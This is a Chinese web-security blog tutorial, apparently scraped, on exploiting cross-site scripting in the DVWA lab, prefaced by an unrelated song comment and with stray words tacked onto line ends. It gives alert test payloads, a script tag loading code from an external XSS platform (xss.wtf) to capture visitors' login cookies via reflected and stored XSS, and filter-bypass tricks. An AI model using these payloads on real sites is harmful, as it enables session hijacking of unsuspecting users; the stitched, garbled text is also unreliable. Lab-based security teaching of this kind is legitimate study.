扎头发,两圈太松,三圈太紧,洗澡,往左一点烫死,往右一点冻死,吃泡面,一桶吃不饱,两桶吃不完,就像咱们的关系。。。web
---- 网易云热评安全
跨站脚本***(XSS),恶意***者在web页面插入恶意script代码,当用户浏览该页面时,恶意代码就会被执行,达到***用户的目的。cookie
造成缘由:程序对输入和输出的过滤不严格xss
1、反射型XSS:须要欺骗用户本身点击连接才能出发XSS代码ide
一、在输入窗口输入123,点击提交,审查元素,能够看到提交的内容显示在了网页工具
二、在输入框输入:<script>alert('123')</script>,点击提交,弹出对话框,说明存在漏洞web安全
2、漏洞利用blog
一、找一个xss平台,注册帐号,新建一个项目ip
二、复制关键代码:<sCRiPt sRC=https://xss.wtf/ltkW></sCrIpT>,将该代码复制到存在漏洞的页面,而后提交it
三、打开xss平台上建立的项目,咱们能够获得DVWA平台登陆的cookie
3、存储型XSS:用户只要访问存在该漏洞的页面就会触发
一、在对话框输入<script>alert('123')</script>,提交,每次刷新页面都会弹出,说明该处存在xss漏洞
二、在对话框输入xss平台上生成的代码<sCRiPt sRC=https://xss.wtf/ltkW></sCrIpT>,点击提交,只要访问该页面的用户,都会在xss平台上看到他的cookie信息
4、xss绕过
一、大小写绕过,将<script>修改成<ScRipt>
二、双写绕过,将<script>修改成<Sc<script>Ript>
三、注释绕过,将<script>修改成<scri<!--aaa--->pt>
四、实体转换,将&改成&,将<改成<,将>改成>等等
禁止非法,后果自负
欢迎关注公众号:web安全工具库